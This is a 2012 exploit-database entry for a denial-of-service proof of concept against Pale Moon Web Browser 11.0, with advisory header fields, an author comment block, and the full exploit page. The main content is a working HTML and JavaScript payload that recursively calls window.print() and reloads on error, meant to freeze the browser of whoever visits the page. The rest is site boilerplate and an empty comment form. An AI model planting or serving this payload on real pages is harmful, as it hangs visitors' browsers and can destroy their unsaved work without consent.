Pale Moon Web Browser 11.0 Denial Of Service

2012.03.27

Credit: eidelweiss

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

<!--
#Title: Pale Moon Web Browser v11.0 (Multi Looping) DOS exploit
#version: 11.0
#vendor: Moonchild Productions
#download application: http://www.palemoon.org/
#Author: eidelweiss (twitter @RandyArios)
#Contact: admin[at]eidelweiss[dot]info / ariosrandy[at]gmail[dot]com
#Homepage: www.eidelweiss.info
#Tested On: Windows 7 (x86)
#thank`s and Greetz to : devilzc0de, yogyacarderlink, and all hacker`s
#Impact
Browser doesn't respond any longer to any user input, all tabs are no
longer accessible, your work if any might be lost.
#Vulnerability Description
This bug is a typical result of multiple loop.
The flaw exists when the attacker put window.printer() funtion
in multiple loop.User interaction is required to
exploit this vulnerability in that the target must visit a malicious
web page.
-->
<html>
<title>Pale Moon Multi Looping By eidelweiss</title>
<script>
function
eidelweiss()
{
window.onerror=new Function("history.go(0)");
window.print();
eidelweiss();
}
eidelweiss();
</script>
</html>

References:

http://www.palemoon.org/

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Pale Moon Web Browser 11.0 Denial Of Service

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.